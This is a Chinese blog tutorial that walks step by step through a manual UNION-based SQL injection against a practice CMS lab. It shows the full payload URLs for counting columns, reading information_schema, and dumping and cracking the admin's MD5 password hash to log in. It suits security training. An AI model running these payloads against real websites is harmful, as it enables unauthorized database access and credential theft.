cms文件管理系统靶场的手动SQL注入

已于 2023-06-17 17:16:49 修改
阅读量2.3k 收藏 19
点赞数 2
分类专栏: 靶场分析 文章标签: sql 网络安全
于 2023-06-17 15:58:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42589016/article/details/131235293
版权

SQL注入

手动注入

  1. 首先登录靶场
    在这里插入图片描述

  1. 随便点一个,我点的是"网游分级标准研究有初步成果 已上报至中央",看到id=33,有可能是注入点


3. 换一个数看看页面是否变动,若变动则大概率为注入点,换成34

http://10.9.46.96/cms/show.php?id=34

在这里插入图片描述
此时发现页面改变,大概率为sql注入点

注:此处我用了hackbar插件,可从谷歌应用商店下载,需要魔法

我们先认为是sql注入点,不排除有人写一堆静态页面

4.判断是字符型注入还是数字型注入,

判断方式,令id=一个表达式,eg: id=34-1

如果没变化就是字符型注入,若有变化就是数字型注入
http://10.9.46.96/cms/show.php?id=34-1
在这里插入图片描述5. 尝试联合注入

  • 判断有多少字段,增加最后一位数字直到报错 http://10.9.46.96/cms/show.php?id=33 order by 1

在这里插入图片描述 http://10.9.46.96/cms/show.php?id=33 order by 15没报错
在这里插入图片描述 http://10.9.46.96/cms/show.php?id=33 order by 16报错,说明该表中有15个字段

  • 现在需要查看哪些位置可以回显http://10.9.46.96/cms/show.php?id=33 and 1=3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,得到结果,3,11
    在这里插入图片描述注:id =33 and 1=3 是为了不让查询出结果,影响显示
    select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 中数字是为了占位

  • 现在查看当前数据库和版本http://10.9.46.96/cms/show.php?id=33 and 1=3 union select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15,得到数据库名’cms’数据库版本5.5.53
    在这里插入图片描述

  • 查询数据库表名 http://10.9.46.96/cms/show.php?id=33 and 1=3 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema='cms',报错Illegal mix of collations for operation ‘UNION’,由百度得,是由于编码原因,其中group_concat()函数用于将查询结果拼接成一行,否则显示只显示一行,详情请见补充
    在这里插入图片描述

  • 将结果转化为16进制输出以解决问题http://10.9.46.96/cms/show.php?id=33 and 1=3 union select 1,2,HEX(group_concat(table_name)),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema='cms'',其中HEX()函数用于将结果转化为16进制636D735F61727469636C652C636D735F63617465676F72792C636D735F66696C652C636D735F667269656E646C696E6B2C636D735F6D6573736167652C636D735F6E6F746963652C636D735F706167652C636D735F7573657273
    在这里插入图片描述- 利用brupsuit进行解码得"cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users"
    在这里插入图片描述- 对"cms_users"表得字段名进行查询http://10.9.46.96/cms/show.php?id=33 and 1=3 union select 1,2,HEX(group_concat(column_name)),4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.columns where table_schema='cms' and table_name = 'cms_users'得到十六进制7573657269642C757365726E616D652C70617373776F7264
    在这里插入图片描述- 用burpsuit进行转码得userid,username,password
    在这里插入图片描述- 对表中得username字段和password字段进行查询得到十六进制161646D696E ,十六进制26531306164633339343962613539616262653536653035376632306638383365
    在这里插入图片描述- 用burpsuite解码得用户名admin 密码e10adc3949ba59abbe56e057f20f883e
    在这里插入图片描述- 显然,这一串文本不像是密码,因为mysql会使用md5算法进行数据加密,所以使用md5对其再进行解密,得到密码123456网址:https://www.cmd5.com/
    在这里插入图片描述**注:**MD5,SHA算法是用来校验完整性的,因其不可逆特性才被用来加密

  • 尝试登录
    点击后台管理
    在这里插入图片描述输入用户名密码
    在这里插入图片描述
    成功登录
    在这里插入图片描述

补充

information_schema

  1. 简介
    MySql 5 以上内置了一个information_schema数据库,用于存储所有数据库和表结构的信息;
    information_schema中有数个只读表。它们实际上是视图,而不是基本表,因此,你将无法看到与之相关的任何文件。
    在这里插入图片描述

  2. 重要表

    • SCHEMATA表:提供了当前MySql 实力中所有数据库的信息,使用show databases;时结果就取于此表。
    • TABLES表:存储数据库中的所有的表的信息,包括表属于哪个数据库。使用show tables时,结果取自此表
    • COLUMNS表:存储表中的所有列的信息,包括列属于哪个表。

本次所用函数

  1. select database():显示当前所在数据库在这里插入图片描述
  2. select version();显示当前数据库版本在这里插入图片描述
  3. group_concat()将所查出的结果拼接到一行显示在这里插入图片描述
  4. HEX()将所查出的结果转化为十六进制在这里插入图片描述
Panzerkampfwagen VI
关注
专栏目录
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 367
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
【漏洞复现】熊海cms 存在sql注入 附poc
失心少年
11-26 1314
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。其采用前后端整合设计思路,php,Apache,mysql,前端使用Bootstrap和少许jquery前端框架开发;熊海CMS 是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统
sql注入靶场实操
weixin_45711977的博客
06-23 3646
sql注入靶场实操
动态调试|Maccms SQL 注入分析(附注入盲注脚本)
xiaoi123的博客
08-28 1002
0x01 前言 已经有一周没发表文章了,一个朋友叫我研究maccms的代码审计,碰到这个注入的漏洞挺有趣的,就在此写一篇分析文。 0x02 环境 Web: phpstudy System: Windows 10 X64 Browser: Firefox Quantum Python version : 2.7 Tools: JetBrains PhpStorm 2018.1.6 x64、Se...
常见的 CTF Web 靶场
最新发布
m0_57836225的博客
10-13 307
漏洞类型:有暴力破解漏洞、跨站脚本漏洞、跨站请求伪造、SQL 注入漏洞、远程命令/代码执行、文件包含漏洞、不安全的文件下载、不安全的文件上传、越权漏洞、目录遍历、敏感信息泄露、PHP 反序列化漏洞、XXE(XML External Entity Attack)、不安全的 URL 重定向、SSRF(Server-Side Request Forgery)等。- 特点:对文件上传漏洞的类型进行了详细的分类,如普通文件上传、文件后缀过滤、文件内容检测等,让学习者可以全面地了解文件上传漏洞的各种情况。
cms文章管理系统靶场——sql手注
WinnieRingo的博客
07-21 1466
cms文章管理系统靶场是适合初级渗透人员学习sql注入靶场之一。
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 387
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞。 漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
Taocms SQL注入(CVE-2021-44915)复现--春秋云镜靶场
m7789的博客
11-24 1149
Taocms 3.0.2版本存在SQL注入漏洞。该漏洞源于应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞通过功能编辑类别进行SQL注入
熊海CMS网站SQL注入、XSS攻击、cookie篡改
m0_63917373的博客
11-01 2110
熊海CMS sqlmap工具 SQL注入 XSS cookie篡改
Sqlmap速查表/功能移植/Python批量检测SQL注入
浪子燕青的博客
03-11 1548
title: Sqlmap速查表与Python进行功能移植 copyright: true top: 0 date: 2021-02-27 11:59:00 tags: [扫描注入,注入,sqlmap] categories: 安全开发 permalink: password: keywords: description: Sqlmap速查,对其WAF识别功能移植,对其Sql注入的payload进行移植,完成Python批量检测SQL注入。 今天的剑桥对我而言只是一百年前那个剑桥的幻影,但我还会不由自主.
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3225
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
2021-7-7红日团队靶场
热门推荐
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
答疑存在sql注入的php168cms
08-15
cms问题答疑处存在sql注入,可sqlmap跑数据库。。。
Sqli - labs实战笔记
浪子燕青的博客
02-25 541
Sqli - labs 安装与lesson1-4实战 所需环境: 1. PHP 2. MYSQL 3. Apache/Nginx 以上三项Debian都自带了,2与3直接开启即可,但是有几点要注意: 1. Debian下的MySql每次登录的时候默认需要授权,即必须使用sudo,可以修改配置文件忽略默认授权,修改方法在之前的文件有提起过. 2. Apache存放文件放在/var/www/html/目录下 3. sqli-labs 使用的PHP5编写的,但是Debian默认安装PHP7,兼..
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 4228
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
SQL注入:对cms管理系统进行SQL注入,分别使用手工注入和自动化注入两种方法,获取管理员的账号密码。
2401_83124412的博客
06-29 393
进行字符转码:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users。id=33 and 1=1 /and 1=2判断。3.爆破字段,猜测数据在cms_users表里面,查看字段,有id,username,password三个字段。回显报错信息,因为联合查询,每列的数据类型不同而报错,将 table_name。传参id=33’,报错’’’,可初步判定存在数字型注入点,进一步验证。
sql注入之联合查询,cms靶场,最详细的过程
qq_43583125的博客
08-23 443
1.注入点判断id=35id=362.联合查询​ 2.1 判断列数order by 15 正常order by 16 报错====>所以有15列​ 2.2判断回显位​ 2.3查询数据库名​ 2.4查询表名​ 2.5获取列名​ 2.6查询字段,获取账号密码​ 2.6查询字段,获取账号密码。
『PHP代码审计』飓风CMS1.10存在SQL注入漏洞
Ho1aAs‘s Blog
06-11 553
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 其他管理——TAG专题,点击提交添加tag 抓包 POST /x/admin/ajax.php?xhash=599b40fe938db62cf441b4dc7d2fa3e7 HTTP/1.1 Host: testcms.com Content-Length: 169 Accept: application/json, text/java
知名CMS软件Joomla 存SQL注入漏洞
weixin_33709219的博客
10-23 544
2019独角兽企业重金招聘Python工程师标准>>> ...
joomla cms 3.2-3.44 前台sql注入结果分析
06-08
对于 Joomla CMS 3.2-3.4.4 的前台 SQL 注入漏洞,攻击者可以通过构造恶意的 SQL 语句来绕过应用程序的身份验证和访问控制,从而获取敏感信息或者修改、删除、添加数据。 攻击者可以利用 SQL 注入漏洞执行各种恶意操作,例如: - 获取敏感信息:攻击者可以通过构造 SQL 注入语句来获取敏感信息,如用户凭证、信用卡信息等。 - 篡改数据:攻击者可以通过 SQL 注入来修改数据库中的数据,如修改账户余额、删除重要数据等。 - 注入恶意代码:攻击者可以通过 SQL 注入来注入恶意代码,如 XSS 攻击等。 为了避免 SQL 注入漏洞的风险,应该采取以下措施: - 对输入数据进行有效的过滤和验证,避免恶意数据的注入。 - 使用参数化查询代替字符串拼接的方式构造 SQL 语句,避免 SQL 注入攻击。 - 最小化数据库用户的权限,避免攻击者通过 SQL 注入攻击获取敏感信息或者篡改数据。 - 及时更新应用程序和数据库系统的补丁,避免已知的漏洞被攻击者利用。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值